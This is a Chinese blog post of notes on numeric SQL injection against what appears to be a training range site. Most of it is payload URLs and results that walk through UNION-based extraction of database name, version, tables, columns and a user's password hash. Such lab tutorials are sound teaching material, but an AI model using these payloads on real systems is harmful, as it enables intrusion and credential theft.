数字型SQL注入笔记-男黑客靶场

数字型

特点:不需要单引号闭合
例如数字型语句:select * from table where id =2

1-添加单引号

正常

http://www.nanhack.com/payload/sql/number.php?id=2

异常

http://www.nanhack.com/payload/sql/number.php?id=2'

2-添加and 1=1

正常

http://www.nanhack.com/payload/sql/number.php?id=2 and 1=1

异常

http://www.nanhack.com/payload/sql/number.php?id=2' and 1=1

3-添加and 1=2

异常

http://www.nanhack.com/payload/sql/number.php?id=2 and 1=2

异常

http://www.nanhack.com/payload/sql/number.php?id=2' and 1=2

数字型注入步骤如下:

判断列数

输入1-9,报错

http://www.nanhack.com/payload/sql/number.php?id=6 union select 1,2,3,4,5,6,7,8,9#

输入1-8,正常

http://www.nanhack.com/payload/sql/number.php?id=6 union select 1,2,3,4,5,6,7,8#

得到结果如下

select * from admins where id=6 union select 1,2,3,4,5,6,7,8
-----------------------------
用户名: 0236
邮箱:00000@qq.com
故该表为8列

寻找注入点

id=-6,也就是union前面出错才会显示union后面语句结果

输入

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,2,3,4,5,6,7,8--

得到结果如下

select * from admins where id=-6 union select 1,2,3,4,5,6,7,8--
-----------------------------
用户名: 2
邮箱:4

找到注入点

猜测数据库名

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,database(),3,4,5,6,7,8#

得到

select * from admins where id=-6 union select 1,database(),3,4,5,6,7,8
-----------------------------
用户名: nanhack
邮箱:4

爆出表名以及数据库版本

group_concat(table_name)将爆出的表名整合成一个字符串

输入

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,version(),3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()#

得到

select * from admins where id=-6 union select 1,version(),3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()
-----------------------------
用户名: 5.5.58
邮箱:admin_logs,admins,class,facebook,kaiban,message,news,user

爆出user表字段

输入

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,version(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='user'#

得到

select * from admins where id=-6 union select 1,version(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='user'
-----------------------------
用户名: 5.5.58
邮箱:id,username,password

爆出user表内容

输入

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,version(),3,group_concat(username,'@',password),5,6,7,8 from nanhack.user#

得到

select * from admins where id=-6 union select 1,version(),3,group_concat(username,'@',password),5,6,7,8 from nanhack.user
-----------------------------
用户名: 5.5.58
邮箱:admin@e10adc3949ba59abbe56e057f20f883e
posted @ 2021-03-12 17:29  codeace  阅读(183)  评论(0)    收藏  举报